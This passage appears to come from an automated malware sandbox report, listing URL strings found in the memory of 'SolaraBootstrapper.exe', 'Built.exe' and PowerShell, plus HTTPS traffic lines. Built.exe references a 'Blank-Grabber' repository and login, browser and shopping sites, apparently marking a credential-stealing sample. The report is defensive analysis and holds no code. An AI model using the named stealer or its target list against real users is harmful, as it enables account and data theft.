Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-85
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-ce7225a304c5.js
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-55a9038b
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-e1
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Dialog_Dialog_js-no
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_j
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_e
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/wp-runtime-233f7e129770.js
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/favicons/favicon.png
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/favicons/favicon.svg
Source: Built.exe, 00000003.00000003.1837956846.000001D5E4FC7000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2042088940.000001D5E4C3C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4FCA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4FA8000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: Built.exe, 00000003.00000003.1837956846.000001D5E4FC7000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4FCA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: Built.exe, 00000003.00000002.2046197420.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gstatic.com/generate_204
Source: Built.exe, 00000003.00000003.1837956846.000001D5E4FC7000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4FCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: Built.exe, 00000003.00000002.2043351840.000001D5E4FA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: Built.exe, 00000003.00000002.2043351840.000001D5E4E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.org
Source: Built.exe, 00000003.00000002.2054526869.000001D5E5904000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2054526869.000001D5E5914000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: powershell.exe, 00000011.00000002.2033751444.00000269116F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1920822285.000001F310077000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://partner.github.com
Source: Built.exe, 00000003.00000002.2042918246.000001D5E4D20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://peps.python.org/pep-0205/
Source: Built.exe, 00000003.00000002.2066532868.00007FFDFB63B000.00000040.00000001.01000000.00000007.sdmp	String found in binary or memory: https://peps.python.org/pep-0263/
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com
Source: Built.exe, 00000003.00000002.2050287577.000001D5E543E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
Source: Built.exe, 00000003.00000002.2042918246.000001D5E4D20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngp
Source: Built.exe, 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
Source: Vjy8d2EoqK.exe, 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, S l r .exe, 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, S l r .exe, 00000004.00000003.1715340990.000000000055D000.00000004.00000020.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000000.1711320937.00000000004F2000.00000002.00000001.01000000.00000010.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.00000000029F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txt
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txtd
Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://resources.github.com
Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://resources.github.com/learn/pathways
Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://skills.github.com
Source: Built.exe, 00000003.00000003.1854557836.000001D5E5D10000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1847371590.000001D5E5D08000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1848424250.000001D5E544C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872057238.000001D5E5D08000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1847371590.000001D5E5D10000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1847774640.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1832084743.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1829183709.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872057238.000001D5E5D10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: Built.exe, 00000003.00000003.1847774640.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1832084743.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1829183709.000001D5E53E1000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872409675.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1829183709.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872343443.000001D5E5498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Built.exe, 00000003.00000003.1847333693.000001D5E551C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1848424250.000001D5E544C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1838072627.000001D5E54BA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1847774640.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1832084743.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1829183709.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: Built.exe, 00000003.00000003.1848424250.000001D5E5498000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872343443.000001D5E5498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: Built.exe, 00000003.00000003.2038069954.000001D5E5463000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2035836310.000001D5E542F000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2030690846.000001D5E5D36000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2050418852.000001D5E5467000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Built.exe, 00000003.00000002.2056924197.000001D5E5D12000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2032955728.000001D5E533B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Built.exe, 00000003.00000003.2038069954.000001D5E5463000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2035836310.000001D5E542F000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2030690846.000001D5E5D36000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2050418852.000001D5E5467000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Built.exe, 00000003.00000002.2056924197.000001D5E5D12000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2032955728.000001D5E533B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Built.exe, 00000003.00000003.1829183709.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1856705420.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2046197420.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: Built.exe, 00000003.00000002.2042088940.000001D5E4C3C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4FA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: Built.exe, 00000003.00000002.2054089602.000001D5E5720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: Built.exe, 00000003.00000002.2054089602.000001D5E5720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: Built.exe, 00000003.00000002.2043351840.000001D5E4FA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://user-images.githubusercontent.com/
Source: Built.exe, 00000003.00000002.2054526869.000001D5E58B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.ca/
Source: Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/
Source: Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.fr/
Source: Built.exe, 00000003.00000002.2054089602.000001D5E5720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Built.exe, 00000003.00000002.2054526869.000001D5E58B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/
Source: Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: Built.exe, 00000003.00000003.1928360339.000001D5E626C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2054526869.000001D5E58B4000.00000004.00001000.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1854557836.000001D5E5D10000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1847371590.000001D5E5D08000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872057238.000001D5E5D08000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1847371590.000001D5E5D10000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2054089602.000001D5E57E8000.00000004.00001000.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872057238.000001D5E5D10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: Built.exe, 00000003.00000003.1847333693.000001D5E551C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1848424250.000001D5E544C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1838072627.000001D5E54BA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1847774640.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1832084743.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872409675.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1829183709.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: Built.exe, 00000003.00000003.1848424250.000001D5E5498000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872343443.000001D5E5498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Built.exe, 00000003.00000003.1847774640.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1832084743.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1829183709.000001D5E53E1000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872409675.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1829183709.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: Built.exe, 00000003.00000003.1848424250.000001D5E5498000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872343443.000001D5E5498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Built.exe, 00000003.00000003.1847333693.000001D5E551C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1838072627.000001D5E54BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: Built.exe, 00000003.00000003.1848424250.000001D5E5498000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872343443.000001D5E5498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Built.exe, 00000003.00000003.1847333693.000001D5E551C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1848424250.000001D5E544C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1848424250.000001D5E5498000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1838072627.000001D5E54BA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1847774640.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1832084743.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1829183709.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872343443.000001D5E5498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Built.exe, 00000003.00000003.1891900310.000001D5E5413000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1847774640.000001D5E5413000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1929245930.000001D5E5416000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1832084743.000001D5E5412000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872409675.000001D5E5416000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
Source: Built.exe, 00000003.00000003.1829183709.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
Source: Built.exe, 00000003.00000003.1848424250.000001D5E5498000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872343443.000001D5E5498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Built.exe, 00000003.00000002.2054526869.000001D5E5914000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: Built.exe, 00000003.00000002.2054526869.000001D5E58B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2065120832.00007FFDF7568000.00000004.00000001.01000000.0000001A.sdmp, Built.exe, 00000003.00000002.2063253690.00007FFDF7203000.00000004.00000001.01000000.0000001B.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: Built.exe, 00000003.00000002.2041700632.000001D5E47E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: Built.exe, Built.exe, 00000003.00000002.2066532868.00007FFDFB6D8000.00000040.00000001.01000000.00000007.sdmp	String found in binary or memory: https://www.python.org/psf/license/
Source: Built.exe, 00000003.00000003.1856705420.000001D5E5360000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2032955728.000001D5E5341000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1829183709.000001D5E5360000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1884484741.000001D5E5360000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4FA8000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2047540968.000001D5E5341000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: Built.exe, 00000003.00000002.2054089602.000001D5E5720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: Built.exe, 00000003.00000002.2054526869.000001D5E58B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: Built.exe, 00000003.00000003.1837956846.000001D5E4FC7000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4FCA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
